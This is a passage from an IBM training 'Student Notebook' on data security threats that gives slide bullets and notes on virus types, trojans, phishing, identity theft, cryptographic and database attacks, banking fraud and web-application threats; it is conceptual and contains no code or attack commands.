- Through corrupt media (CD-ROM, USB drive or DVD)
- Through another program
There can be many forms of a virus. The section below introduces of all these forms and also explains how
they corrupt a system.

V10.1
Student Notebook
Uempty

IBM Power Systems
Notes:
The figure shows the different types of virus which can damage a computing system. Explanation of the types
of virus mentioned in the diagram has been provided in the next slides.

Student Notebook

IBM Power Systems
• Armored Virus
– This virus use protective course to cover themselves in order to deny disassemblers or debuggers to
examine their critical elements
• Companion Virus
– This kind of virus creates a program within the system which has a different file name extension after
attaching to the programs which are legitimate
• Macro Virus
– This virus exploit the applications which the programmer use to increase the application capability
• Phage Virus
– The databases and the programs are altered and modified by a phage virus. All the files present on
the database are infected by this virus
Notes:
The working of these viruses is explained under.
Armored Virus: Detection or analyzing armored viruses is very difficult because of the way it is created. They use
protective course to cover themselves in order to deny disassemblers or debuggers to examine their critical elements.
They are written in such a way that most of the programming is used as a false program that distract analysis. This will
take more time for virus deconstruction. The longer it can stay on the device, the more time it has to make copies and
spread to various other systems. In order to stop this type of virus from hampering the system, they have to be identified
quickly and administrators must be educated about them.
Companion Virus: This kind of virus creates a program within the system which has a different file name extension after
attaching to the programs which are legitimate. The usual plays where this kind of file may reside is the temporary
directory of the system. Now, when the name of the legitimate program will be typed by the user, the companion will be
executed instead of the program which is real. In this way the virus will be effectively hidden form the user.
Macro Virus: This virus exploit the applications which the programmer use to increase the application capability. The
enhancements of the application programs are exploited. These program include word, excel etc. For example a macro
which is the programs in the word document can tell the processor to spell check a certain document at the time when the
document is opened. In this way it can infect all the document that are available on the system. The virus can also spread
to other systems in the network through the way of email or other methods.
Phage Virus: The databases and the programs are altered and modified by a phage virus. All the files present on the
database are infected by this virus. The only way to get rid of this virus is program re-installation. The virus will start to
corrupt the system again, if even a solitary incident associated with the virus is missed on the victim system.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Multipartite Virus
– As the name suggest, multipartite virus can attack a system in multiple manners
• Polymorphic Virus
– This virus attacks a system by displaying a message and then starts to delete all the file that are on
the system
• Retro Virus
– This type of virus is also knows as anti-antivirus as this virus tries to surpass the antivirus which has
been installed on the system
• Stealth Virus
– This virus attaches to the hard-drive’s boot sector and redirects all the commands that are around it
when a system program or utility runs
Notes:
The working of these viruses is explained under.
Multipartite Virus: As the name suggest, multipartite virus can be attack a system in multiple manners. Like it
infect the boot sectors or the executable files. It can also destroy the application files that are available on the
system. These viruses attack the boot sectors and corrupt the whole system.
Polymorphic Virus: In order to avoid getting detected, a polymorphic virus changes its order form. This virus
attacks a system by displaying a message and then starts to delete all the file that are on the system. It also
attempts to stay hidden from the antivirus software that is installed. In order to do so, the virus will encrypt
some part of its code. This process is called mutation. Virus detection by any antivirus software by its
common characteristics is made hard by this process. Fig. 3 explains the working of a polymorphic virus.
Retro Virus: This type of virus is also knows as anti-antivirus as this virus tries to surpass the antivirus which
has been installed on the system. This virus can destroy the database file of virus definition of an antivirus
and bypass it. If the knowledge about the virus possessed by the antivirus is destroyed then it will have no
clue about the type of virus entering the system.
Stealth Virus: This virus masks itself from other applications in order to avoid detection. It is attached to the
hard-drive’s boot sector. It redirects all the commands that are around it when a system program or utility
runs. During a virus scan, the Stealth virus moves itself from one to another file which allows it to not getting
detected

Student Notebook

IBM Power Systems
• Trojan
– Trojan horses use the identity of other programs to enter a system or a network
– A valid program can be replaced by a Trojan horse during its installation
– After it has taken the identity of another program it would accomplish its mission to corrupt the system
– In case a Trojan horse is detected the whole program must be reinstalled immediately
Notes:
Trojan: Trojan horses use the identity of other programs to enter a system or a network. They may be
included as a part of an installed program or an attachment. A valid program can be replaced by a Trojan
horse during its installation by creating a back door. After it has taken the identity of another program it would
accomplish its mission to corrupt the system. Before Trojans are detected, they can be existent for many
years on a system. In order to counter them the best way is to not let them enter the system. Any new
operating system or software must be backed up immediately after end before it is installed. In case a Trojan
horse is detected the whole program must be reinstalled immediately, this would also work as a counter
against it. Another way to detect the Trojan is to do a port scan. During the port scan if a UDP or TCP port is
opened by an app. that is not in a network regularly then there is a possibility that a Trojan horse may be
present on the system.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Adware
– Adware is a type of spyware used by marketers to track Internet user’s habits and interests
– The information is then used to customize future advertisements directed to the user, or can be sold
to a third party for the same purpose
– After it has taken the identity of another program it would accomplish its mission to corrupt the system
– In case a Trojan horse is detected the whole program must be reinstalled immediately
Notes:
Adware: Adware is a type of spyware used by marketers to track Internet user’s habits and interests for the
purpose of customizing future advertising material. Adware can monitor information such as the types of sites
visited, articles read or the types of pop-ups and banners the user clicks on. The information is then used to
customize future advertisements directed to the user, or can be sold to a third party for the same purpose.
Users can minimize their chances of unintentionally downloading spyware onto their computing system by:
- Being wary of banners, ads and pop-ups while surfing the Internet, do not click on them no matter
how enticing they may appear
- Reviewing terms and conditions when they install free programs or subscribe to services from the
Internet.
- Using up-to-date anti-spyware program to regularly scan their computer
These are installed often without the knowledge of the user and can be installed with other programs.
Malicious software are downloaded onto the user’s system by tracking the behavior of the user on the internet
and showing ads which are according to the interest of the user. These programs record every step of the
user and forward it to the center of ad management. This center builds up a detailed profile of the user who
has been tracked and accordingly they display ads from which malicious software are downloaded to their
computers and serious threats arise.

Student Notebook

IBM Power Systems
• Logic Bomb
– These malwares are executed when a certain event which is predefined occurs
– The attack is not started by the bomb but the bomb only tells the attackers that the user to be
attacked has met the needed criteria and is in a state to attack
– When a user is locked on to the internet, a logic bomb may send this information to the attacker and
inform the attacker about the files which the user is accessing
Notes:
Logic Bomb: These malwares are executed when a certain event which is predefined occurs. When a user
is locked on to the internet, a logic bomb may send this information to the attacker and inform the attacker
about the files which the user is accessing. Figure shows the working of a logic bomb. It can be noted that the
attack is not started by the bomb but the bomb only tells the attackers that the user to be attacked has met the
needed criteria and is in a state to attack. A specific date or circumstance can also be setup for a logic bomb
to attack.
The figure illustrates that how a message is sent by a logic bomb to the system which will conduct the attack.
The attack which is conducted by an external system is carried out in 4 steps. These steps are mentioned
below:
a. Logic bomb implanted
b. Installation reported by the victim
c. Attack message sent by the attacker
d. Victim does as indicated by the logic bomb
The system of the victim can then be used to start a massive attack such as D-DoS. It can also be used to
take access to the time which is chosen by the attacker

V10.1
Student Notebook
Uempty
Types of Data Security Threats (Contd.) IBM ICE (Innovation Centre for Education)
IBM Power Systems
• Network Based Threats

– Network based threats that can cause huge harm
– Securing the network is a major part of network security and management
– There has been a huge increase in the number of hackers and other criminals creating malicious
threats over the last five years
Figure 1-23. Types of Data Security Threats (Contd.) DS011.0
Notes:
Network based threats
Security threats that can cause huge harm have increased with an increasing number of people getting
connected to the networks. Securing the network is a major part when it comes to network that has to be
maintained because through the network information is passed from one system to another which makes the
information vulnerable of getting attacked. There has been a huge increase in the number of hackers and
other criminals creating malicious threats over the last five years. The malicious threats are pumped into
network which makes it vulnerable for getting attack below are some threats which the network faces:

Student Notebook
Network Based Threats (1 of 11) IBM ICE (Innovation Centre for Education)
IBM Power Systems
• Botnet Threat
– They are number of Internet computers that have been set up to forward transmissions (including
spam or viruses) to other computers on the internet
– This can prove to be major security threat as the network is acting as a center that is sending
malicious files to other systems
– Cyber criminals consider botnets as one of their major tool to carry out a cyber-attack
– HTTP and peer-to-peer channel technology are used now-a-days to create botnets
Figure 1-24. Network Based Threats (1 of 11) DS011.0
Notes:
Botnets Threat: They are number of Internet computers that, although their owners are unaware of it, have
been set up to forward transmissions (including spam or viruses) to other computers on the internet. This can
prove to be major security threat as the network without the knowledge of any user will be acting as a center
that is sending files which are malicious in nature to other systems connected to the network. Cyber criminals
consider botnets as one of their major tool to carry out a cyber-attack. Over the time, botnets have also
become more robust. HTTP and peer-to-peer channel technology are used now-a-days to create them and
tiered infrastructure is used to build them making them harder to break. Also, botnets can be remotely
managed, which means that there is a very low chance that the culprit will be caught. There is a need of
security expertise for any organization to combat the botnet threat. Though it would incur a specific amount of
money but having a security expertise would be a good decision as a botnet attack on even a low scale can
be humungous. An organization can lose its reputation, a huge amount of money and can even face lawsuits
filed against them. These attacks don’t only just hamper large companies but smaller companies are also
affected by these attacks

V10.1
Student Notebook
Uempty
IBM Power Systems
• Phishing
– This threat lures the victim by showcasing the identity of a trustworthy public platform and then all the
critical credentials of the victim is retrieved
– The incidents of phishing started to come in picture in 1995
– Earlier, the phishers used to copy source codes from the AOL websites and then craft a page which
would look like a part of the website
– Emails are used now-a-days to lure the victim
Notes:
Phishing: This threat is a form of social engineering. In this attack, the victim is lured by the attacker (also
known as phisher in this case) by showcasing the identity of a trustworthy public platform to them and then all
the critical credentials of the victim is retrieved. The incidents of phishing started to come in picture in 1995
where emails were used by the internet scammers to lure victims and their financial information and
passwords were retrieved. Earlier, the phishers used to copy source codes from the AOL websites and then
craft a page which would look like a part of the website from which they had copied the codes from. They
would then send spoofed emails and other messages to the victim. This email would contain the link to the
false web page, asking the victims to register their passwords. There are 3 roles to be played by the phisher
or the attacker in case of a phishing attack. First is to send out a huge count of duplicitous emails through
botnets or some other medium. The second step involves the phisher setting up false websites which are
hosted on a system which is compromised. This website will prompt the victim to render their confidential and
sensitive information. Third and the last role is to use the confidential information which the user has provided
to achieve a pay-out. The process of phishing is demonstrated in the figure given in the next slide.

Student Notebook
IBM Power Systems
Notes:
The diagrammatic explanation of the phishing process has been shown in this figure. The previous slide has
explained this diagram in more detail.

V10.1
Student Notebook
Uempty
IBM Power Systems
• Types of Phishing Process

– Clone Phishing: A cloned email is created by the phisher in this type of phishing attack to lure the
victim
– Spear Phishing: A specific group is targeted by spear phishing whose members have something in
common between them
– Phone Phishing: As the name suggests, this type of phishing is carried out using mobile phones
Notes:
Given below are some of the types of phishing process:
Clone Phishing: A cloned email is created by the phisher in this type of phishing attack. This is done by
retrieving recipient address and content from a legitimate email which has been sent previously. After
retrieving this email, they send the same email to the victim after replacing the links on the mail with malicious
links. Address spoofing is also employed such that the email looks like that it has been send by the original
sender. Also, it is claimed that the email which was sent later is just an updated version of the email which
was sent earlier so that the victim believes in the fake process
Spear Phishing: A specific group is targeted by spear phishing. The spear phishers target a selected group of
people who have something in common with each other instead of targeting different people individually. The
attacker (in this case spear phisher) targets the people who work for a common organization or go to the
same hospital etc. when this attack is used against a target which is very high-level in nature, then this kind of
attack is known as whaling
Phone Phishing: In this type, victims are called by the phisher who claims to be calling from a certain bank.
The victims is asked to share their confidential information associated to their bank account on the phone so
that necessary processes can be carried out. IP are easy to manipulate, thus phishers use IP rather than
voice to carry out these attacks. After the phisher owned and VoIP service provided phone number is dialed
by the victim, a voice prompts the victim to enter the account number and the PIN associated with it. Once the
victim enters this information he can be exploited by making monetary transaction from his account. Caller ID
spoofing is used along with this which makes the call as if it has been made from a trusted source.

Student Notebook
IBM Power Systems
• Purposes of Phishing Scam

– Theft of login credentials
– Theft of banking credentials
– Observation of Credit Card details
– Postal address and other personal information
– Theft of confidential documents like trade secrets
Notes:
Below are some of the common purposes, due to which phishing scams are carried out:
- Theft of login credentials: Credentials which are required for accessing the services available online
such as Gmail, Flipkart etc. are a big target of the phishers. Also the trading credentials of the
customers which are available online have also become a big target as money transfers on the
international basis can be carried out very easily.
- Theft of banking credentials: The credential which are needed to log in online are also a target for the
phishers. Huge monetary transactions can be made.
- Observation of Credit Card details: Credentials for using credit cards are of a huge value to most of
the criminals. Credentials like credit card number, credit card validation numbers, name of the
cardholder etc. can be used to make monetary transactions
- Postal address and other personal information: Marketing companies have a huge demand for
personal information such as address, email id, phone numbers etc.

V10.1
Student Notebook
Uempty - Theft of confidential documents like trade secrets: Trade secrets and proposals are big target of the
phishers as they are hugely benefitted if they sell these confidential documents to the rival
companies. The purpose of acquisition and industrial espionage can be served by spear heading
techniques
- Distribution of D-DoS and botnets agents: Phishing scams are used by the attackers to install specific
D-DoS and bot agents on the computers. These agents ate added to the distributed networks and
serve the purpose of these kind of attacks
- Attack Propagation: A single host which is in a compromised state can be used as an internal jump
point within an organization for attacks to be carried out in the future. This is carried out by a mixture
of bot agents and spear phishing installations
Thus phishing can be a serious threat when it comes to securing the data of an organization.

Student Notebook
IBM Power Systems
• Packet Sniffing
– A packet sniffer is a device or program that allows eavesdropping on traffic travelling between
networked computers
– In a network, a packet sniffer can filter out personal information and this can lead to areas such as
identity theft
– Packet sniffer can intercept and log traffic passing over a digital network or part of a network
– As data streams travel back and forth over the network, the sniffer captures each packet and
eventually decodes it
Notes:
Packet sniffing: A packet sniffer is a device or program that allows eavesdropping on traffic travelling
between networked computers. The packet sniffer will capture data that is addressed to other machines,
saving it for later analysis. In a network, a packet sniffer can filter out personal information and this can lead to
areas such as identity theft so this is a major security threat to a network. Packet sniffer can intercept and log
traffic passing over a digital network or part of a network. As data streams travel back and forth over the
network, the sniffer captures each packet and eventually decodes and analyzes its content according with
any specifications.

V10.1
Student Notebook
Uempty
IBM Power Systems
• Identity Theft
– Identity theft is when information which can only be identified personally is used by an unauthorized
party to assume the victim’s identity
– Information such as address, credit card number, name or bank account number is used by the
attacker to commit frauds
– There are many ways by which personal information of the victim can be stolen
Notes:
Identity theft: When information which can only be identified personally is used by an unauthorized party to
assume the victim’s identity and fraud or other criminal acts are committed, then the process is known as
identity theft. Information such as address, credit card number, name or bank account number is used by the
attacker to commit frauds. There are many ways by which personal information of the victim can be stolen.
The various ways are enlisted in the next slide.

Student Notebook
IBM Power Systems
• Identity Theft
– The Various ways are enlisted below:
• By stealing the victim’s purses and wallets
• By stealing the victim’s mail
• By completing a ‘change of address form’
• By diving through the victim’s trash
• By taking personal information of the victim available on the social networking sites
Notes:
The various ways are enlisted below:
By stealing the victim’s purses and wallets which have their credit cards, bank information and other
identification cards
- By stealing the victim’s mail which have the information about their bank statements, new checks
phone bills, utility bills etc.
- By completing a ‘change of address form’ in order to redirect the mail’s destination of the victim
- By diving through the victim’s trash and collecting the personal data which has been discarded. This
practice is known as ‘dumpster diving’
- By taking personal information that the victim shares or posts on the social networking sites

V10.1
Student Notebook
Uempty
IBM Power Systems
• Identity Theft (Contd.)

– After stealing the identity of a user, the unauthorized party can do anything with the personal data that
they will get access to. Usually following things can occur:
• Change their mailing address on their credit card account
• Open new lines of credit
• Establish phone services
• Write bad checks on the victim’s name
• Forge checks
• Apply for auto loans
Notes:
After stealing the identity of a user, the unauthorized party can do anything with the personal data that they
will get access to. Usually following things can occur:
- Call their creditors and change their mailing address on their credit card account
- Open new lines of credit using their personal identification information
- Establish phone services using their name which are charged to them
- Open bank accounts in their name and write bad checks.
- Forge checks to wipe out their bank account
- Apply for auto loans taken out in their name

Student Notebook
IBM Power Systems
• Password Attacks
– This attack is carried out by determining or finding passwords
– The networks and systems which are password protected can be exploited
– Data available can be breached
– This attack can be carried out online as well
Notes:
Password attacks: This attack is carried out by determining or finding passwords to various electronic areas
which are protected. The networks and systems which are password protected can be exploited by the
attackers if they somehow determine the passwords of the same. The attackers can then steal data which is
available on that system. This attack can be carried out online as there are many software which can obtain
passwords for the attackers

V10.1
Student Notebook
Uempty
IBM Power Systems
• Hardware Loss and Residual Data Fragments

– It is one of the growing worry for organizations and government
– For example: If a number of computer systems are stolen form a single bank then all the details of the
clients that were stored on those systems would be stolen
– The attacker can then steal the identity of the client and can do frauds on a huge basis
– The only method to keep hardware safe is by keeping them under proper surveillance
Notes:
Hardware Loss and Residual Data Fragments: One of the growing worry for the organizations and for even
the government has been the residual data fragments and hardware loss. For example: If a number of
computer systems are stolen form a single bank then all the details of the clients that were stored on those
systems would be stolen. The attacker can then steal the identity of the client and can do frauds on a huge
basis. This concern has grown significantly over the years to a huge stature. The only method to keep
hardware safe is by keeping them under proper surveillance

Student Notebook
IBM Power Systems
• Cryptographic Threats
– Confidentiality of data is very important to maintain
– Cryptographic threats can exploit the present loophole and can damage the confidentiality
– Several high-profile laptop thefts have raised awareness about the dangers of storing large quantities
of personally identifying information without encrypting it
– Even when encryption is used, threats to confidentiality still exist
Notes:
Cryptographic threats
When sensitive information is transmitted outside of trusted systems, it should be encrypted to preserve
confidentiality. Few consumers would want their credit card information transmitted through the Internet as
plain text. Even when data is stored on an organization's own devices, it is sometimes encrypted to prevent
information theft. Several high-profile laptop thefts have raised awareness about the dangers of storing large
quantities of personally identifying information on mobile devices. Even when encryption is used, threats to
confidentiality still exist. Some of the threats associated to cryptography has been explained in the next
slides.

V10.1
Student Notebook
Uempty
Cryptographic Threats (1 of 7) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Attacking the key

– The Keys are attacked directly in this type of attack to determine its value
– Commonly used passwords, a serial of different words or other combinations can be used by an
attacker to crack a password
– A password can be broken by an attacker by using the information and access provided by many of
the manufacturers of operating systems
Figure 1-36. Cryptographic Threats (1 of 7) DS011.0
Notes:
Attacking the key: The Keys are attacked directly in this type of attack and the value of a key is discovered.
The keys can be the following:
- Key based encryption information
- Encrypted messages
- Passwords
To crack a password, commonly used passwords, a serial of different words or other combinations which may
be randomly selected can be used by an attacker. The key value is guessed repeatedly in a key attack in
order to crack a key. Access is allowed to encryption and password subsystem by many of the manufacturers
of operating systems, as they provide programming interfaces. A password can be broken by an attacker by
using this information and access.

Student Notebook

IBM Power Systems
• Attacking the Algorithm

– The algorithms and programming instructions used for data encryption are at risk as well
– A program might not be made secure by an algorithm if error is not corrected
– Back doors are available in many algorithms which can be used to attack the algorithm
– A security exposure of significant measure may exist if a weakness is discovered in the programming
Notes:
Attacking the algorithm: Not only the keys but the algorithms and the programming instructions that are
used for data encryption are at risk as well. A program might not be made secure by an algorithm if discovery
and correction of an error is not done by the developers of a program. Back doors which are well-publicized
are available in many algorithms. A security exposure of significant measure may exist if a weakness is
discovered in the model or programming which is used for algorithm development.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Intercepting the Transmission

– The attackers may gain information inadvertently about the systems of encryption that are in use
– A major problem in this situation of security is human error
– A security system can be undermined by someone unintentionally as well
Notes:
Intercepting the transmission: The attackers may over a period of time gain information inadvertently about
the systems of encryption that are used by an organization due to the process of intercepting a transmission.
The ability of an attacker using frequency analysis to break an algorithm depends on how much information
can the attackers gain. A major problem in the situations of security is human error. A security system can be
undermined if someone unintentionally releases information and that information is used against the system
of security.

Student Notebook

IBM Power Systems
• Code-breaking Techniques
– Frequency Analysis
– Algorithm Errors
– Exploiting Human Error
Notes:
Code-breaking techniques: The common techniques of code-breaking are explained as under:
Frequency Analysis: In frequency analysis, it is determined whether any patterns which are common exist.
This is carried out by watching at an encrypted message and the blocks associated with it. The patterns of the
message are looked upon initially and it is not tried to break the code by the analyst. The method used for
data encryption can be deduced by a determined cryptanalyst if he/she looks for these types of patterns. This
process may take a huge amount of effort or at times can be very simple
Algorithm Errors: A set of instruction used to do a particular task is called an algorithm. To perform recurring
operations in a computer, implementation of algorithms in programs is done. Unpredictable results are
sometimes produced by complex algorithms. The entire system of encryption can be compromised if the
results are discovered. There can be flaws fundamentally present in the design of the cryptographic systems.
A weakness in the entire coding system can be created if a flaw or an error takes place in the implementation
or designing of the steps. Regardless of the number of steps used for code processing or the complexity of
the algorithm, this weakness in the implementation or designing of the steps may lead to the decryption of the
coding system
Exploiting Human Error: Many vulnerabilities take place due to human error. Someone can send an email in
the unencrypted or clear form even if an email is sent using a scheme of encryption. If a cryptanalyst has both
the messages, then the decoding process of future messages will be easy. The key’s insights can be
exposed, if a code key winds up in the wrong hands. These types of accidents have resulted in breaking
down of many systems

V10.1
Student Notebook
Uempty

IBM Power Systems
• Birthday Attack
– An attack which is targeted at a key is a birthday attack.
– For Example: There will be a likely probability that if there are 25 people sitting in a room, at least two
of them will have their birthdays on the same date
– Likewise if one key of an organization is determined, then there is a possibility that some other key
will resemble the determined key
– This attack is based on probability of occurrence
Notes:
Birthday Attack: An attack which is targeted at a key is an example of a birthday attack. This method attacks
on the results and not on the algorithm itself. It takes a simple premise to build a birthday attack. There will be
a likely probability that if there are 25 people sitting in a room, at least two of them will have their birthdays on
the same date. With every additional person entering the room, this probability will also increase. It is
important to understand what probability is? It doesn’t mean that the occurrence of an event has been defined
but it is a term which says that an event is likely to occur or happen.
The likelihood is fairly high that 2 persons may have their birthdays on the same day in each meeting. The
odds of finding two people with the same birthday increases with the increase in the number of people that
are entering in the room. The premise is the same for a birthday attack that is if the key of an infrastructure is
hashed, there is a possibility that another value can be created if enough time is given which will give hash of
the same value. Even MD5 has been shown to be susceptible to a birthday attack

Student Notebook

IBM Power Systems
• Weak Key Attack

– Passwords which are common in nature are used by many people. This threat exploits this loophole
– The hash value resulting from the key will be very easy to guess if the length of the key is short
– The passwords must be made more complicated to mitigate this threat
Notes:
Weak Key Attack: The basis of these attacks is that many passwords which are common in nature are used
by many people. The hash value resulting from the key will be very easy to guess if the length of the key is
short. It must be made sure by the security team that the employees of the organization are using strong
encryption keys and passwords that can’t be guessed easily. A random system which generates password
may also be considered by the security team. To launch a weak key attack becomes more difficult, if the
password is made more complicated and longer.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Mathematical Attack
– These kinds of attacks are basically focused on the following things:
• The algorithm of encryption
• Any potential weakness area or the key mechanism
• To determine the operation of the system, statistical analysis and mathematical modeling is used
by these attacks
• Interception of huge amount of data
• Attempting to decrypt the message methodically
Notes:
Mathematical Attack: A mathematical attack is an assault on key personal information i.e. passwords, by
decrypting the password using very highly advanced math's sequences. This process can either take a
matter of minutes or even weeks depending on how diverse the password is, for example if the password is
just 6-10 letters long which are all lower case it can take minutes, but if it includes various numbers, letters
and higher case letters it could take days or weeks. Generally mathematical attacks are only used for weak
key passwords due to the amount of time it takes to decrypt a versatile password, but the more powerful of a
computer and software an intruder has the less time it will take. To prevent being under a mathematical attack
an organization should have a password which is related to them and is totally random as well as a stronger
encryption key. This slide talks about the various things on which this threat is focused on.

Student Notebook
IBM Power Systems
• Database Security Threats

– The database infrastructure of any organization faces a huge array of threats
– Critical information stored on the database makes it a target for the cyber criminals
– Cyber criminals can earn a huge amount of profit by breaching the databases of an organization
Notes:
Database Security Threats
The database infrastructure of any organization faces a huge array of threats. The databases have plenty of
critical information which is of valuable nature stored in them, thus making it a target for the cyber criminals. It
can have data of financial importance, corporate secrets or other intellectual property which if stolen can have
a huge impact on an organization. Cyber criminals can earn a huge amount of profit by breaching the
databases of an organization. Mentioned in the next slides are the threats which database of any organization
face.

V10.1
Student Notebook
Uempty
Database Security Threats (1 of 6) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Excessive Privilege Abuse

– Sometimes employees are granted privileges for accessing the database above the requirements of
their job role
– These excessive privileges can be misused by them
– For example: An administrator of a university can be given excessive privilege that he can update or
change grades of the students. The administrator can take advantage of this situation and can
change the grades of the students who he dislikes
Figure 1-44. Database Security Threats (1 of 6) DS011.0
Notes:
Excessive Privilege Abuse: Sometimes employees who work for an organization are granted privileges for
accessing the database which exceed their requirements of their job role. These excessive privileges can be
misused by them for purposes which can cause damage to the organization. For example an administrator of
a university can be given excessive privilege that he can update or change grades of the students. The
administrator can take advantage of this situation and can change the grades of the students who he dislikes.
As a result, the reputation of the university can be at stake

Student Notebook

IBM Power Systems
• Legitimate Privilege Abuse

– Database can be misused by the authorized employees for unauthorized purposes
– For example: A worker is not happy with the management of the healthcare firm for some reason and
thus he takes revenge by retrieving and saving some of the records of the patients. In this way the
data can be misused
– Storing a huge amount of data on the system can create this threat as well
Notes:
Legitimate Privilege Abuse: Users who have been given legitimate privileges to use the database can use it
for unauthorized purposes. Let’s take an example to understand this threat. A worker working in a healthcare
firm has been given the privilege that the worker can view the medical records of any patient via a web
application. The worker is not happy with the management of the healthcare firm for some reason and thus he
takes revenge by retrieving and saving some of the records of the patients. Though the web application limits
the worker such that numerous records cannot be watched concurrently and copies can’t be made
electronically. But limitations were surpassed by the worker as the database was connected to an alternative
application such as MS-Excel. Another threat can be that a negligent employee retrieves and stores a huge
amount of data on the system. In this case, the data existing on the system becomes vulnerable to laptop
theft, malware attacks etc

V10.1
Student Notebook
Uempty

IBM Power Systems
• Privilege Elevation
– Attackers can convert the privileges associated to access
– They take advantage of the vulnerabilities that are existent on the database platform software
– These vulnerabilities can be found in implementation of the protocol, SQL statements etc.
– For example: At a financial institution a software developer can take advantage of a function which is
vulnerable and gain access to the privileges of the database administrator
Notes:
Privilege Elevation: Attackers can convert the privileges associated to access from those of an ordinary user
and change it to the privilege of an administrator. They take advantage of the vulnerabilities that are existent
on the database platform software. These vulnerabilities can be found in implementation of the protocol, SQL
statements, built in function and stored procedures. For example, at a financial institution a software
developer can take advantage of a function which is vulnerable and gain access to the privileges of the
database administrator. Once he has the privileges associate to the administrator, the developer can turn off
the mechanisms associated to audits, transfer funds, create fraud accounts, etc.

Student Notebook

IBM Power Systems
• SQL Injection
– Unauthorized statements are injected in the database
– The targeted databases include input parameter of web applications
– The entire database can be accessed by SQL injections
Notes:
SQL Injection: In this type of attack, database statements which are unauthorized are injected or inserted by
perpetrators into a SQL data channel which is vulnerable. Typically, input parameters of web application and
stored procedures are included in the targeted data channels. The statements once injected are passed to
the database to be executed. Unrestricted access to an entire database can be gained by the attackers by
using SQL injections

V10.1
Student Notebook
Uempty

IBM Power Systems
• Hopscotch
– Hopscotch is a game often played by cyber criminals
– Hopscotch is a process where a weakness is first identified by the attacker and then used as a
leverage for some more attack
– This process is repeated until the attackers reach the backend of the database system
– For example: Hackers use worms to find their way around the accounts department of the
organization and then they hit the processing area associated with the credit cards
Notes:
Hopscotch: Hopscotch is a game often played by cyber criminals rather than taking advantage of buffer
overflow and gaining total access to the database of an organization. Hopscotch is a process where a
weakness is first identified by the attacker which exists in the organization’s infrastructure and then using it as
a leverage for some more attack which are more serious in nature. This process is repeated until the
attackers reach the backend of the database system. For example, hackers use worms to find their way
around the accounts department of the organization and then they hit the processing area associated with the
credit cards. This risk can be mitigated by creating segregating systems and separate accounts associated
with administrator.

Student Notebook

IBM Power Systems
• Stolen Database Backups

– Insiders as well as external attackers both pose a potent threat
– These stealing activities are done for profit, money or simply to take revenge
– Modern organizations face this problem daily
– Encrypting the database backups is the only way to mitigate this type of threat
Notes:
Stolen database backups: Insiders as well as external attackers are both a potent threat when it comes to
stealing the backups created in the database. These stealing activities are done for profit, money or simply to
take revenge. Modern organizations face this problem daily as the insiders also steal archives including
database backups etc. Encrypting the database backups is the only way to mitigate this type of threat which is
faced due to the insiders.

V10.1
Student Notebook
Uempty
IBM Power Systems
• Banking Fraud Threats

– A bank customer is a potential target for fraud activities
– Many of a customer’s vital information is available with the bank that can be breached
– There are mainly 3 types of bank fraud threats

• Electronic fraud
• Credit/debit card fraud
• Cheque fraud
Notes:
Banking Fraud Threats
A bank customer is a potential target for fraud activities. Many of a customer’s vital information is available
with the bank that if breached can affect the lives of the customer and the reputation of the bank as well.
There are mainly 3 types of bank fraud threats also illustrated by the diagram given in the slide which follows.

Student Notebook
Banking Fraud Threats (1 of 4) IBM ICE (Innovation Centre for Education)

IBM Power Systems
Figure 1-51. Banking Fraud Threats (1 of 4) DS011.0
Notes:
This slide shows the type of bank fraud threats which have been explained in the slides which follow.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Electronic Fraud
– This fraud is carried out by making the customer to an authentic looking but actually fake website and
give in their account details
– This process falls in the category of electronic frauds.
– Another method is to send a security message and advice the customer to install software that will
check viruses and also remove them
Notes:
Electronic fraud threat: Sometimes customers are informed that their security details and passwords need
to be updated on their emails. They are asked to login to an authentic looking but actually fake website and
give in their account details. This process falls in the category of electronic frauds. The main purpose of these
fake websites is to gain the log of users and the details associated with their bank accounts. Another method
that is used by the cyber criminals is to send a security message and advice the customer to install software
that will check viruses and also remove them. When the customers use and download these software, they
are actually tricked into downloading a virus which will gain access to their accounts.

Student Notebook

IBM Power Systems
• Credit and Debit Card Fraud Threat

– In this type of threat, the debit or credit card of a customer is reproduced
– Skimming is the common term given to these kinds of crime.
– The cards can also be intercepted while it is being sent to someone else or in other words it is in
transit.
– The cards can also be misused by a merchant who undertakes transactions of a duplicate nature on
the customer’s card
Notes:
Credit and debit card fraud threat: In this type of threat, the debit or credit card of a customer is reproduced
and the balance that is credited to their account is used to obtain monetary advantage. Every card has a
magnetic strip attached to it which has a unique code. A credit or a debit card is misused when this
information on the magnetic strip is reproduced. Skimming is the common term given to these kinds of crime.
Another way in which this kind of fraud occurs is when the card of a customer is lost and it is used by
someone who is not authorized to use it. The cards can also be intercepted while it is being sent to someone
else or in other words it is in transit. The cards can also be misused by a merchant who is dishonest and
undertakes transactions of a duplicate nature on the customer’s card.

V10.1
Student Notebook
Uempty

IBM Power Systems
• Cheque Fraud Threat

– This involves making the unlawful use of cheques
– Following are ways by which cheque fraud can be executed

• Cheque is altered without having any authority
• Cheques are first stolen and then they are altered
• Cheques are duplicated or counterfeited
• False invoices are used to get access to the Cheques which are legitimate
• Cheques are deposited into the account of third party without any authority
• Cheques are deposited for payments with having the knowledge that funds in the account are
insufficient for the transaction
Notes:
Cheque fraud threat: Cheque fraud refers to a category of criminal acts that involve making the unlawful use
of cheques in order to illegally acquire or borrow funds that do not exist within the account balance or
account-holder's legal ownership. Most methods involve taking advantage of the float(the time between the
negotiation of the cheque and its clearance at the cheque-writer's bank) to draw out these funds. Financial
advantage is gained by using a cheque in this attack. The ways in which banking frauds can be executed
have been mentioned in this slide.

Student Notebook
IBM Power Systems
• Web-application Threats
– Malicious users can gain unauthorized access to the web-application and exploit a vulnerability
– Many internet servers are constantly in vulnerability probe
– Thus security measures must be built around the web application of an organization
Notes:
Web-application Threats
If the web application of an organization is accessed by a number of unknown users, then it is certain that the
users which have malicious intent will try to gain unauthorized access to the application which are in the
network of the organization. Internet has many servers which are publically accessible. These servers are
constantly in vulnerability probe. Thus precautions must be taken and security measures must be built around
the web application of an organization. Below are some threats which are associated with web application:

V10.1
Student Notebook
Uempty
Web-application Threats (1 of 5) IBM ICE (Innovation Centre for Education)

IBM Power Systems
• Spoofing
– In this attack, the identity of a process or a user is impersonated
– Credentials of different users are typed in a spoofing attack.
